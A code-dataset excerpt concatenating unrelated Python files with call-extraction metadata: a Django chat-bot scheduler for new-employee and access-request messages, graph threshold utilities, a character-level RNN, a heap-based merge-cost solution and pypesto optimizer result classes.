'(0)'}), '(default=0)\n', (6719, 6730), False, 'from django.db import models\n'), ((6743, 6787), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (6759, 6787), False, 'from django.db import models\n'), ((6854, 6920), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (6871, 6920), False, 'from django.db import models\n'), ((6938, 7002), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Rankings'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Rankings, on_delete=models.CASCADE, default=0)\n', (6955, 7002), False, 'from django.db import models\n'), ((7018, 7062), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (7034, 7062), False, 'from django.db import models\n'), ((7075, 7105), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (7092, 7105), False, 'from django.db import models\n'), ((7158, 7189), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (7174, 7189), False, 'from django.db import models\n'), ((7211, 7241), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7230, 7241), False, 'from django.db import models\n'), ((7268, 7298), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7287, 7298), False, 'from django.db import models\n'), ((2782, 2807), 'datetime.date', 'datetime.date', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (2795, 2807), False, 'import datetime\n')] |
import enum
import datetime
from chat_bots.models import Sender
from slack_bot.bot import SlackBot
from telegram_bot.bot import TelegramBot
class MessengerType(enum.Enum):
Telegram = 'Telegram'
Slack = 'Slack'
class SenderBots:
new_employee_channel_id = None
new_employee_chat_bot = None
access_request_channel_id = None
access_request_chat_bot = None
@staticmethod
def updateBots():
sender = Sender.objects.first()
if sender:
employee_chat_bot = sender.newEmployeeChatBot
access_chat_bot = sender.accessRequestChatBot
SenderBots.new_employee_channel_id = sender.newEmployeeChannelId
SenderBots.access_request_channel_id = sender.accessRequestChannelId
SenderBots.new_employee_chat_bot = SenderBots.createBot(employee_chat_bot)
SenderBots.access_request_chat_bot = SenderBots.createBot(access_chat_bot)
@staticmethod
def createBot(chat_bot):
if chat_bot.botType.messenger_type == MessengerType.Telegram.name:
return TelegramBot(chat_bot.token)
if chat_bot.botType.messenger_type == MessengerType.Slack.name:
return SlackBot(chat_bot.token)
@staticmethod
def getCorrectTime():
time = Sender.objects.filter(newEmployeeChannelId=SenderBots.new_employee_channel_id).first().sendTime
now = datetime.datetime.now().time()
date = datetime.date.today()
if time < now:
date = date + datetime.timedelta(days=1)
return datetime.datetime.combine(date, time)
@staticmethod
def sendNewEmployeeMessage(data):
message = f"Новый сотрудник: {data['first_name']} {data['second_name']}. Отдел: {data['department']}," \
f" должность: {data['position']}"
correct_time = SenderBots.getCorrectTime()
SenderBots.new_employee_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
@staticmethod
def sendAccessEmployeeMessage(user, services):
message = f"{user.first_name} {user.second_name} запрашивает доступ к следующим сервисам: {', '.join(services)}"
correct_time = SenderBots.getCorrectTime()
SenderBots.access_request_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
if Sender.objects.first():
SenderBots.updateBots()
| [
"chat_bots.models.Sender.objects.first",
"datetime.date.today",
"datetime.timedelta",
"slack_bot.bot.SlackBot",
"chat_bots.models.Sender.objects.filter",
"telegram_bot.bot.TelegramBot",
"datetime.datetime.combine",
"datetime.datetime.now"
] | [((2521, 2543), 'chat_bots.models.Sender.objects.first', 'Sender.objects.first', ([], {}), '()\n', (2541, 2543), False, 'from chat_bots.models import Sender\n'), ((438, 460), 'chat_bots.models.Sender.objects.first', 'Sender.objects.first', ([], {}), '()\n', (458, 460), False, 'from chat_bots.models import Sender\n'), ((1431, 1452), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1450, 1452), False, 'import datetime\n'), ((1544, 1581), 'datetime.datetime.combine', 'datetime.datetime.combine', (['date', 'time'], {}), '(date, time)\n', (1569, 1581), False, 'import datetime\n'), ((1070, 1097), 'telegram_bot.bot.TelegramBot', 'TelegramBot', (['chat_bot.token'], {}), '(chat_bot.token)\n', (1081, 1097), False, 'from telegram_bot.bot import TelegramBot\n'), ((1190, 1214), 'slack_bot.bot.SlackBot', 'SlackBot', (['chat_bot.token'], {}), '(chat_bot.token)\n', (1198, 1214), False, 'from slack_bot.bot import SlackBot\n'), ((1385, 1408), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1406, 1408), False, 'import datetime\n'), ((1502, 1528), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1520, 1528), False, 'import datetime\n'), ((1275, 1353), 'chat_bots.models.Sender.objects.filter', 'Sender.objects.filter', ([], {'newEmployeeChannelId': 'SenderBots.new_employee_channel_id'}), '(newEmployeeChannelId=SenderBots.new_employee_channel_id)\n', (1296, 1353), False, 'from chat_bots.models import Sender\n')] |
import math
import random
__BASE_SEED = 1
def constant_thresholds(graph, value):
"""Sets a constant threshold for every node of the graph."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Add a constant attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = value
return thresholds
def degree_proportional_thresholds(graph, fraction=0.5):
"""Sets a threshold for every node of the graph to be proportional to its in-degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Compute the threshold based on the in-degree and add it to every node
for node in graph.Nodes():
degree = node.GetInDeg()
threshold = math.floor(degree * fraction) + 1
thresholds[node.GetId()] = threshold
return thresholds
def random_thresholds(graph, seed):
"""Sets a threshold for every node of the graph to be a random integer between 1 and its degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Set the random seed to be able to reproduce results
random.seed(__BASE_SEED + seed)
# Add a random attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = random.randint(1, node.GetDeg())
return thresholds
| [
"random.seed",
"math.floor"
] | [((1132, 1163), 'random.seed', 'random.seed', (['(__BASE_SEED + seed)'], {}), '(__BASE_SEED + seed)\n', (1143, 1163), False, 'import random\n'), ((750, 779), 'math.floor', 'math.floor', (['(degree * fraction)'], {}), '(degree * fraction)\n', (760, 779), False, 'import math\n')] |
"""
Minimal character-level Vanilla RNN model. Written b_y <NAME> (@karpathy)
BSD License
"""
import numpy as np
import unicodedata
import string
import codecs
# data I/O
data = codecs.open('data/potter.txt', 'r', encoding='utf8', errors='ignore').read()
fake = codecs.open('data/output.txt', 'w', encoding='utf8')
chars = list(set(data))
data_size = len(data) #
vocab_size = len(chars)
print(f'data has {data_size} characters,{vocab_size} unique.') # data has 1109177 characters,80 unique.
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
print(char_to_ix)
print(ix_to_char)
# hyperparameters
hidden_size = 256 # size of hidden layer of neurons
seq_length = 128 # number of steps to unroll the RNN for
learning_rate = 1e-1
# model parameters
W_xh = np.random.randn(hidden_size, vocab_size) * 0.01 # weight: input to hidden
W_hh = np.random.randn(hidden_size, hidden_size) * 0.01 # weight: hidden to hidden
W_hy = np.random.randn(vocab_size, hidden_size) * 0.01 # weight: hidden to output
b_h = np.zeros((hidden_size, 1)) # hidden bias
b_y = np.zeros((vocab_size, 1)) # output bias
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
and c in all_letters
)
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers indicating which unique character.
inputs: a seq_length size list
hprev is (H x 1) array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
xs, hs, ys, ps = {}, {}, {}, {} # sx[t] = ys[t] = ps[t] size = vocab_size x 1
hs[-1] = np.copy(hprev) # hs[t] size = hidden_size * 1
loss = 0 # xs: input line; ys: output line; hs: hidden states, multiple of them,
# even the weights are reused, the states are different from each other.
# forward pass
for t in range(len(inputs)):
xs[t] = np.zeros((vocab_size,1)) # encode in 1-of-k representation
xs[t][inputs[t]] = 1 # inputs[t] is a index number, xs[t] is a vector
hs[t] = np.tanh(np.dot(W_xh, xs[t]) + np.dot(W_hh, hs[t-1]) + b_h) # hidden state
ys[t] = np.dot(W_hy, hs[t]) + b_y # unnormalized log probabilities for next chars
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # (normalized) probabilities for next chars
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
print(f'loss: {loss}')
# print(f'xs:{len(xs[t])}->{xs[t]}\n hs:{len(hs[t])}->{hs[t]}\n ys:{len(ys[t])}->{ys[t]}\n ps:{len(ps[t])}->{ps[t]}')
# backward pass: compute gradients going backwards
dW_xh = np.zeros_like(W_xh) # gradient of W_xh, same shape as W_xh
dW_hh = np.zeros_like(W_hh) # gradient of W_hh, same shape as W_hh
dW_hy = np.zeros_like(W_hy) # gradient of W_hy, same shape as W_hy
db_h = np.zeros_like(b_h) # gradient of b_h, same shape as b_h
db_y = np.zeros_like(b_y) # gradient of b_y, same shape as b_y
dhnext = np.zeros_like(hs[0])
for t in reversed(range(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1
# backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dW_hy += np.dot(dy, hs[t].T)
db_y += dy
dh = np.dot(W_hy.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
db_h += dhraw
dW_xh += np.dot(dhraw, xs[t].T)
dW_hh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(W_hh.T, dhraw)
for dparam in [dW_xh, dW_hh, dW_hy, db_h, db_y]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
return loss, dW_xh, dW_hh, dW_hy, db_h, db_y, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
i.e. do predictions :)
"""
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
ixes = []
for t in range(n):
h = np.tanh(np.dot(W_xh, x) + np.dot(W_hh, h) + b_h)
y = np.dot(W_hy, h) + b_y
p = np.exp(y) / np.sum(np.exp(y))
ix = np.random.choice(range(vocab_size), p=p.ravel())
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
n, p = 0, 0
mW_xh, mW_hh, mW_hy = np.zeros_like(W_xh), np.zeros_like(W_hh), np.zeros_like(W_hy)
mb_h, mb_y = np.zeros_like(b_h), np.zeros_like(b_y) # memory variables for Adagrad
smooth_loss = -np.log(1.0 / vocab_size) * seq_length # loss at iteration 0
while True:
try:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p + seq_length + 1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
# sample from the model now and then
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ''.join(ix_to_char[ix] for ix in sample_ix)
print('----\n %s \n----' % (txt, ))
# forward seq_length characters through the net and fetch gradient
loss, dW_xh, dW_hh, dW_hy, db_h, db_y, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
if n % 100 == 0:
print(f'iter{n}, loss: {smooth_loss}') # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([W_xh, W_hh, W_hy, b_h, b_y],
[dW_xh, dW_hh, dW_hy, db_h, db_y],
[mW_xh, mW_hh, mW_hy, mb_h, mb_y]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
p += seq_length # move data pointer
n += 1 # iteration counter
except KeyboardInterrupt:
sample_ix = sample(hprev, inputs[0], data_size)
txt = ''.join(ix_to_char[ix] for ix in sample_ix)
fake.write(txt)
break
fake.close() | [
"unicodedata.normalize",
"numpy.zeros_like",
"codecs.open",
"numpy.copy",
"numpy.random.randn",
"numpy.log",
"unicodedata.category",
"numpy.zeros",
"numpy.clip",
"numpy.exp",
"numpy.dot",
"numpy.sqrt"
] | [((263, 315), 'codecs.open', 'codecs.open', (['"""data/output.txt"""', '"""w"""'], {'encoding': '"""utf8"""'}), "('data/output.txt', 'w', encoding='utf8')\n", (274, 315), False, 'import codecs\n'), ((1301, 1327), 'numpy.zeros', 'np.zeros', (['(hidden_size, 1)'], {}), '((hidden_size, 1))\n', (1309, 1327), True, 'import numpy as np\n'), ((1391, 1416), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (1399, 1416), True, 'import numpy as np\n'), ((994, 1034), 'numpy.random.randn', 'np.random.randn', (['hidden_size', 'vocab_size'], {}), '(hidden_size, vocab_size)\n', (1009, 1034), True, 'import numpy as np\n'), ((1096, 1137), 'numpy.random.randn', 'np.random.randn', (['hidden_size', 'hidden_size'], {}), '(hidden_size, hidden_size)\n', (1111, 1137), True, 'import numpy as np\n'), ((1199, 1239), 'numpy.random.randn', 'np.random.randn', (['vocab_size', 'hidden_size'], {}), '(vocab_size, hidden_size)\n', (1214, 1239), True, 'import numpy as np\n'), ((2084, 2098), 'numpy.copy', 'np.copy', (['hprev'], {}), '(hprev)\n', (2091, 2098), True, 'import numpy as np\n'), ((3430, 3449), 'numpy.zeros_like', 'np.zeros_like', (['W_xh'], {}), '(W_xh)\n', (3443, 3449), True, 'import numpy as np\n'), ((3545, 3564), 'numpy.zeros_like', 'np.zeros_like', (['W_hh'], {}), '(W_hh)\n', (3558, 3564), True, 'import numpy as np\n'), ((3660, 3679), 'numpy.zeros_like', 'np.zeros_like', (['W_hy'], {}), '(W_hy)\n', (3673, 3679), True, 'import numpy as np\n'), ((3774, 3792), 'numpy.zeros_like', 'np.zeros_like', (['b_h'], {}), '(b_h)\n', (3787, 3792), True, 'import numpy as np\n'), ((3887, 3905), 'numpy.zeros_like', 'np.zeros_like', (['b_y'], {}), '(b_y)\n', (3900, 3905), True, 'import numpy as np\n'), ((4002, 4022), 'numpy.zeros_like', 'np.zeros_like', (['hs[0]'], {}), '(hs[0])\n', (4015, 4022), True, 'import numpy as np\n'), ((5068, 5093), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (5076, 5093), True, 'import numpy as np\n'), ((5482, 5501), 'numpy.zeros_like', 'np.zeros_like', (['W_xh'], {}), '(W_xh)\n', (5495, 5501), True, 'import numpy as np\n'), ((5503, 5522), 'numpy.zeros_like', 'np.zeros_like', (['W_hh'], {}), '(W_hh)\n', (5516, 5522), True, 'import numpy as np\n'), ((5524, 5543), 'numpy.zeros_like', 'np.zeros_like', (['W_hy'], {}), '(W_hy)\n', (5537, 5543), True, 'import numpy as np\n'), ((5557, 5575), 'numpy.zeros_like', 'np.zeros_like', (['b_h'], {}), '(b_h)\n', (5570, 5575), True, 'import numpy as np\n'), ((5577, 5595), 'numpy.zeros_like', 'np.zeros_like', (['b_y'], {}), '(b_y)\n', (5590, 5595), True, 'import numpy as np\n'), ((179, 248), 'codecs.open', 'codecs.open', (['"""data/potter.txt"""', '"""r"""'], {'encoding': '"""utf8"""', 'errors': '"""ignore"""'}), "('data/potter.txt', 'r', encoding='utf8', errors='ignore')\n", (190, 248), False, 'import codecs\n'), ((2544, 2569), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (2552, 2569), True, 'import numpy as np\n'), ((4080, 4094), 'numpy.copy', 'np.copy', (['ps[t]'], {}), '(ps[t])\n', (4087, 4094), True, 'import numpy as np\n'), ((4245, 4264), 'numpy.dot', 'np.dot', (['dy', 'hs[t].T'], {}), '(dy, hs[t].T)\n', (4251, 4264), True, 'import numpy as np\n'), ((4530, 4552), 'numpy.dot', 'np.dot', (['dhraw', 'xs[t].T'], {}), '(dhraw, xs[t].T)\n', (4536, 4552), True, 'import numpy as np\n'), ((4570, 4596), 'numpy.dot', 'np.dot', (['dhraw', 'hs[t - 1].T'], {}), '(dhraw, hs[t - 1].T)\n', (4576, 4596), True, 'import numpy as np\n'), ((4612, 4633), 'numpy.dot', 'np.dot', (['W_hh.T', 'dhraw'], {}), '(W_hh.T, dhraw)\n', (4618, 4633), True, 'import numpy as np\n'), ((4696, 4730), 'numpy.clip', 'np.clip', (['dparam', '(-5)', '(5)'], {'out': 'dparam'}), '(dparam, -5, 5, out=dparam)\n', (4703, 4730), True, 'import numpy as np\n'), ((5361, 5386), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (5369, 5386), True, 'import numpy as np\n'), ((5666, 5690), 'numpy.log', 'np.log', (['(1.0 / vocab_size)'], {}), '(1.0 / vocab_size)\n', (5672, 5690), True, 'import numpy as np\n'), ((2870, 2889), 'numpy.dot', 'np.dot', (['W_hy', 'hs[t]'], {}), '(W_hy, hs[t])\n', (2876, 2889), True, 'import numpy as np\n'), ((2994, 3007), 'numpy.exp', 'np.exp', (['ys[t]'], {}), '(ys[t])\n', (3000, 3007), True, 'import numpy as np\n'), ((3115, 3143), 'numpy.log', 'np.log', (['ps[t][targets[t], 0]'], {}), '(ps[t][targets[t], 0])\n', (3121, 3143), True, 'import numpy as np\n'), ((4297, 4315), 'numpy.dot', 'np.dot', (['W_hy.T', 'dy'], {}), '(W_hy.T, dy)\n', (4303, 4315), True, 'import numpy as np\n'), ((5223, 5238), 'numpy.dot', 'np.dot', (['W_hy', 'h'], {}), '(W_hy, h)\n', (5229, 5238), True, 'import numpy as np\n'), ((5257, 5266), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (5263, 5266), True, 'import numpy as np\n'), ((5931, 5957), 'numpy.zeros', 'np.zeros', (['(hidden_size, 1)'], {}), '((hidden_size, 1))\n', (5939, 5957), True, 'import numpy as np\n'), ((1539, 1570), 'unicodedata.normalize', 'unicodedata.normalize', (['"""NFD"""', 's'], {}), "('NFD', s)\n", (1560, 1570), False, 'import unicodedata\n'), ((3017, 3030), 'numpy.exp', 'np.exp', (['ys[t]'], {}), '(ys[t])\n', (3023, 3030), True, 'import numpy as np\n'), ((5276, 5285), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (5282, 5285), True, 'import numpy as np\n'), ((7170, 7190), 'numpy.sqrt', 'np.sqrt', (['(mem + 1e-08)'], {}), '(mem + 1e-08)\n', (7177, 7190), True, 'import numpy as np\n'), ((2787, 2806), 'numpy.dot', 'np.dot', (['W_xh', 'xs[t]'], {}), '(W_xh, xs[t])\n', (2793, 2806), True, 'import numpy as np\n'), ((2809, 2832), 'numpy.dot', 'np.dot', (['W_hh', 'hs[t - 1]'], {}), '(W_hh, hs[t - 1])\n', (2815, 2832), True, 'import numpy as np\n'), ((5170, 5185), 'numpy.dot', 'np.dot', (['W_xh', 'x'], {}), '(W_xh, x)\n', (5176, 5185), True, 'import numpy as np\n'), ((5188, 5203), 'numpy.dot', 'np.dot', (['W_hh', 'h'], {}), '(W_hh, h)\n', (5194, 5203), True, 'import numpy as np\n'), ((1582, 1605), 'unicodedata.category', 'unicodedata.category', (['c'], {}), '(c)\n', (1602, 1605), False, 'import unicodedata\n')] |
import sys
input = sys.stdin.readline
import heapq as hq
# input
t = int(input())
for _ in range(t):
chapter = int(input())
pages = list(map(int, input().split()))
# process
'''
각 장이 섞여도 됨.
>> 힙에서 제일 작은 거 두 개 합치고 다시 넣음.
'''
sol = 0
hq.heapify(pages)
for _ in range(chapter - 1):
cost = hq.heappop(pages) + hq.heappop(pages)
sol += cost
hq.heappush(pages, cost)
# output
print(sol) | [
"heapq.heappush",
"heapq.heapify",
"heapq.heappop"
] | [((240, 257), 'heapq.heapify', 'hq.heapify', (['pages'], {}), '(pages)\n', (250, 257), True, 'import heapq as hq\n'), ((351, 375), 'heapq.heappush', 'hq.heappush', (['pages', 'cost'], {}), '(pages, cost)\n', (362, 375), True, 'import heapq as hq\n'), ((297, 314), 'heapq.heappop', 'hq.heappop', (['pages'], {}), '(pages)\n', (307, 314), True, 'import heapq as hq\n'), ((317, 334), 'heapq.heappop', 'hq.heappop', (['pages'], {}), '(pages)\n', (327, 334), True, 'import heapq as hq\n')] |
"""Optimization result."""
import warnings
from collections import Counter
from copy import deepcopy
from typing import Sequence, Union
import numpy as np
import pandas as pd
from ..objective import History
from ..problem import Problem
from ..util import assign_clusters, delete_nan_inf
OptimizationResult = Union['OptimizerResult', 'OptimizeResult']
class OptimizerResult(dict):
"""
The result of an optimizer run.
Used as a standardized return value to map from the individual result
objects returned by the employed optimizers to the format understood by
pypesto.
Can be used like a dict.
Attributes
----------
id:
Id of the optimizer run. Usually the start index.
x:
The best found parameters.
fval:
The best found function value, `fun(x)`.
grad:
The gradient at `x`.
hess:
The Hessian at `x`.
res:
The residuals at `x`.
sres:
The residual sensitivities at `x`.
n_fval
Number of function evaluations.
n_grad:
Number of gradient evaluations.
n_hess:
Number of Hessian evaluations.
n_res:
Number of residuals evaluations.
n_sres:
Number of residual sensitivity evaluations.
x0:
The starting parameters.
fval0:
The starting function value, `fun(x0)`.
history:
Objective history.
exitflag:
The exitflag of the optimizer.
time:
Execution time.
message: str
Textual comment on the optimization result.
optimizer: str
The optimizer used for optimization.
Notes
-----
Any field not supported by the optimizer is filled with None.
"""
def __init__(
self,
id: str = None,
x: np.ndarray = None,
fval: float = None,
grad: np.ndarray = None,
hess: np.ndarray = None,
res: np.ndarray = None,
sres: np.ndarray = None,
n_fval: int = None,
n_grad: int = None,
n_hess: int = None,
n_res: int = None,
n_sres: int = None,
x0: np.ndarray = None,
fval0: float = None,
history: History = None,
exitflag: int = None,
time: float = None,
message: str = None,
optimizer: str = None,
):
super().__init__()
self.id = id
self.x: np.ndarray = np.array(x) if x is not None else None
self.fval: float = fval
self.grad: np.ndarray = np.array(grad) if grad is not None else None
self.hess: np.ndarray = np.array(hess) if hess is not None else None
self.res: np.ndarray = np.array(res) if res is not None else None
self.sres: np.ndarray = np.array(sres) if sres is not None else None
self.n_fval: int = n_fval
self.n_grad: int = n_grad
self.n_hess: int = n_hess
self.n_res: int = n_res
self.n_sres: int = n_sres
self.x0: np.ndarray = np.array(x0) if x0 is not None else None
self.fval0: float = fval0
self.history: History = history
self.exitflag: int = exitflag
self.time: float = time
self.message: str = message
self.optimizer = optimizer
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def summary(self):
"""Get summary of the object."""
message = (
"### Optimizer Result \n\n"
f"* optimizer used: {self.optimizer} \n"
f"* message: {self.message} \n"
f"* number of evaluations: {self.n_fval} \n"
f"* time taken to optimize: {self.time} \n"
f"* startpoint: {self.x0} \n"
f"* endpoint: {self.x} \n"
)
# add fval, gradient, hessian, res, sres if available
if self.fval is not None:
message += f"* final objective value: {self.fval} \n"
if self.grad is not None:
message += f"* final gradient value: {self.grad} \n"
if self.hess is not None:
message += f"* final hessian value: {self.hess} \n"
if self.res is not None:
message += f"* final residual value: {self.res} \n"
if self.sres is not None:
message += f"* final residual sensitivity: {self.sres} \n"
return message
def update_to_full(self, problem: Problem) -> None:
"""
Update values to full vectors/matrices.
Parameters
----------
problem:
problem which contains info about how to convert to full vectors
or matrices
"""
self.x = problem.get_full_vector(self.x, problem.x_fixed_vals)
self.grad = problem.get_full_vector(self.grad)
self.hess = problem.get_full_matrix(self.hess)
self.x0 = problem.get_full_vector(self.x0, problem.x_fixed_vals)
class OptimizeResult:
"""Result of the :py:func:`pypesto.optimize.minimize` function."""
def __init__(self):
self.list = []
def __deepcopy__(self, memo):
other = OptimizeResult()
other.list = deepcopy(self.list)
return other
def __getattr__(self, key):
"""Define `optimize_result.key`."""
try:
return [res[key] for res in self.list]
except KeyError:
raise AttributeError(key)
def __getitem__(self, index):
"""Define `optimize_result[i]` to access the i-th result."""
try:
return self.list[index]
except IndexError:
raise IndexError(
f"{index} out of range for optimize result of "
f"length {len(self.list)}."
)
def __len__(self):
return len(self.list)
def summary(self):
"""Get summary of the object."""
# perform clustering for better information
clust, clustsize = assign_clusters(delete_nan_inf(self.fval)[1])
counter_message = '\n'.join(
["\tCount\tMessage"]
+ [
f"\t{count}\t{message}"
for message, count in Counter(self.message).most_common()
]
)
times_message = (
f'\n\tMean execution time: {np.mean(self.time)}s\n'
f'\tMaximum execution time: {np.max(self.time)}s,'
f'\tid={self[np.argmax(self.time)].id}\n'
f'\tMinimum execution time: {np.min(self.time)}s,\t'
f'id={self[np.argmin(self.time)].id}'
)
summary = (
"## Optimization Result \n\n"
f"* number of starts: {len(self)} \n"
f"* execution time summary: {times_message}\n"
f"* summary of optimizer messages:\n{counter_message}\n"
f"* best value found (approximately) {clustsize[0]} time(s) \n"
f"* number of plateaus found: "
f"{1 + max(clust) - sum(clustsize == 1)} \n"
f"* best value: {self[0]['fval']}, "
f"worst value: {self[-1]['fval']} \n\n"
f"A summary of the best run:\n\n{self[0].summary()}"
)
return summary
def append(
self,
optimize_result: OptimizationResult,
sort: bool = True,
prefix: str = '',
):
"""
Append an OptimizerResult or an OptimizeResult to the result object.
Parameters
----------
optimize_result:
The result of one or more (local) optimizer run.
sort:
Boolean used so we only sort once when appending an
optimize_result.
prefix:
The IDs for all appended results will be prefixed with this.
"""
current_ids = set(self.id)
if isinstance(optimize_result, OptimizeResult):
new_ids = [
prefix + identifier
for identifier in optimize_result.id
if identifier is not None
]
if current_ids.isdisjoint(new_ids) and new_ids:
raise ValueError(
"Some id's you want to merge coincide with "
"the existing id's. Please use an "
"appropriate prefix such as 'run_2_'."
)
for optimizer_result in optimize_result.list:
self.append(optimizer_result, sort=False, prefix=prefix)
elif isinstance(optimize_result, OptimizerResult):
# if id is None, append without checking for duplicate ids
if optimize_result.id is None:
self.list.append(optimize_result)
else:
new_id = prefix + optimize_result.id
if new_id in current_ids:
raise ValueError(
"The id you want to merge coincides with "
"the existing id's. Please use an "
"appropriate prefix such as 'run_2_'."
)
optimize_result.id = new_id
self.list.append(optimize_result)
if sort:
self.sort()
def sort(self):
"""Sort the optimizer results by function value fval (ascending)."""
def get_fval(res):
return res.fval if not np.isnan(res.fval) else np.inf
self.list = sorted(self.list, key=get_fval)
def as_dataframe(self, keys=None) -> pd.DataFrame:
"""
Get as pandas DataFrame.
If keys is a list, return only the specified values, otherwise all.
"""
lst = self.as_list(keys)
df = pd.DataFrame(lst)
return df
def as_list(self, keys=None) -> Sequence:
"""
Get as list.
If keys is a list, return only the specified values.
Parameters
----------
keys: list(str), optional
Labels of the field to extract.
"""
lst = self.list
if keys is not None:
lst = [{key: res[key] for key in keys} for res in lst]
return lst
def get_for_key(self, key) -> list:
"""Extract the list of values for the specified key as a list."""
warnings.warn(
"get_for_key() is deprecated in favour of "
"optimize_result['key'] and will be removed in future "
"releases."
)
return [res[key] for res in self.list]
| [
"pandas.DataFrame",
"copy.deepcopy",
"numpy.argmax",
"collections.Counter",
"numpy.isnan",
"numpy.argmin",
"numpy.max",
"numpy.mean",
"numpy.array",
"numpy.min",
"warnings.warn"
] | [((5219, 5238), 'copy.deepcopy', 'deepcopy', (['self.list'], {}), '(self.list)\n', (5227, 5238), False, 'from copy import deepcopy\n'), ((9657, 9674), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (9669, 9674), True, 'import pandas as pd\n'), ((10229, 10359), 'warnings.warn', 'warnings.warn', (['"""get_for_key() is deprecated in favour of optimize_result[\'key\'] and will be removed in future releases."""'], {}), '(\n "get_for_key() is deprecated in favour of optimize_result[\'key\'] and will be removed in future releases."\n )\n', (10242, 10359), False, 'import warnings\n'), ((2397, 2408), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2405, 2408), True, 'import numpy as np\n'), ((2500, 2514), 'numpy.array', 'np.array', (['grad'], {}), '(grad)\n', (2508, 2514), True, 'import numpy as np\n'), ((2577, 2591), 'numpy.array', 'np.array', (['hess'], {}), '(hess)\n', (2585, 2591), True, 'import numpy as np\n'), ((2653, 2666), 'numpy.array', 'np.array', (['res'], {}), '(res)\n', (2661, 2666), True, 'import numpy as np\n'), ((2728, 2742), 'numpy.array', 'np.array', (['sres'], {}), '(sres)\n', (2736, 2742), True, 'import numpy as np\n'), ((2971, 2983), 'numpy.array', 'np.array', (['x0'], {}), '(x0)\n', (2979, 2983), True, 'import numpy as np\n'), ((6330, 6348), 'numpy.mean', 'np.mean', (['self.time'], {}), '(self.time)\n', (6337, 6348), True, 'import numpy as np\n'), ((6395, 6412), 'numpy.max', 'np.max', (['self.time'], {}), '(self.time)\n', (6401, 6412), True, 'import numpy as np\n'), ((6512, 6529), 'numpy.min', 'np.min', (['self.time'], {}), '(self.time)\n', (6518, 6529), True, 'import numpy as np\n'), ((9336, 9354), 'numpy.isnan', 'np.isnan', (['res.fval'], {}), '(res.fval)\n', (9344, 9354), True, 'import numpy as np\n'), ((6442, 6462), 'numpy.argmax', 'np.argmax', (['self.time'], {}), '(self.time)\n', (6451, 6462), True, 'import numpy as np\n'), ((6559, 6579), 'numpy.argmin', 'np.argmin', (['self.time'], {}), '(self.time)\n', (6568, 6579), True, 'import numpy as np\n'), ((6204, 6225), 'collections.Counter', 'Counter', (['self.message'], {}), '(self.message)\n', (6211, 6225), False, 'from collections import Counter\n')] |
import datetime
import pytest
from unittest.mock import patch
from django.core.exceptions import ValidationError
from freezegun import freeze_time
